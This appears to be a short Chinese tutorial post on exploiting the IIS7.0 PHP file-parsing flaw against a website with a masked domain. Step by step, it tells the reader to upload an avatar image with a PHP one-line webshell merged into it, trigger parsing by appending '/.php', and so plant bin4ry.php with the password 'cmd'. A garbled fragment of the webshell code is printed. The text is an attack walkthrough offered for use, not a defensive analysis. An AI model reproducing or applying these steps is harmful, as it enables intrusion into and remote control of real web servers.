作者:鬼鬼太子_157 | 来源:互联网 | 2017-11-12 23:19
|
IIS7.0 php 错误文件解析漏洞实例演示视频
演示视频下载
|
得到 www.xxxxxxxxi.com web服务为IIS7.0
www.xxxxxxxxi.com/robots.txt后面加上/任意字符.php成功解析为php
注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马
eval($_POST[cmd]);?>)?>
如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话木马,密码cmd
上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php
用一句话木马连接